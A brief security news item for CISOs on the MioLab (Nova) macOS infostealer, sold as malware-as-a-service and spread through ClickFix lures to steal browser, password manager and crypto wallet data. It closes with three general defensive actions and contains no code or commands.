MioLab macOS Stealer Expands With ClickFix Delivery and Wallet Theft Capabilities

What happened

A sophisticated macOS infostealer known as MioLab (also tracked as Nova) has emerged as a malware-as-a-service (MaaS) platform, expanding its capabilities to include ClickFix-style delivery, cryptocurrency wallet theft, and team-based attack tooling. Researchers said the malware is being actively developed and distributed through underground forums, with features designed to steal data from browsers, password managers, and crypto wallets while providing operators with centralized control panels. The latest campaigns use social engineering techniques to trick users into executing malicious code, reflecting a broader shift toward fileless and user-driven infection methods targeting macOS systems. 

Who is affected

macOS users are affected, particularly those who install untrusted software or interact with social engineering lures that prompt them to execute commands or download malicious payloads. 

Why CISOs should care

The emergence of MioLab highlights how macOS is increasingly targeted by advanced infostealers, especially as attackers focus on high-value users such as developers, executives, and cryptocurrency holders. 

3 practical actions

1. Restrict execution of untrusted scripts and installers. Prevent users from running unknown Terminal commands or unsigned applications. 
2. Monitor for ClickFix-style social engineering. Watch for prompts that trick users into copying and executing commands. 
3. Protect browser and wallet data. Implement controls to detect and prevent credential and cryptocurrency theft. 

For more coverage of infostealers, loaders, and evolving malicious tooling, explore our reporting under the Malware tag.